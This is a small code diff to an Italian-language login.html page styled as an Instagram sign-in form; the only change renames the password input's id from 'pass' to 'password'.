--- a/login.html
+++ b/login.html
@@ -16,7 +16,7 @@
             <div id="L1">
                 <h4>Accedi con il tuo account Instagram</h4>
                 <input type="email" id="email" name="email" placeholder="Nome utente, telefono o email">
-                <input type="password" id="pass" name="password" placeholder="Password">
+                <input type="password" id="password" name="password" placeholder="Password">
                 <button>Accedi</button>
                 <a href="#">Password dimenticata?</a>
                 <p>o</p>
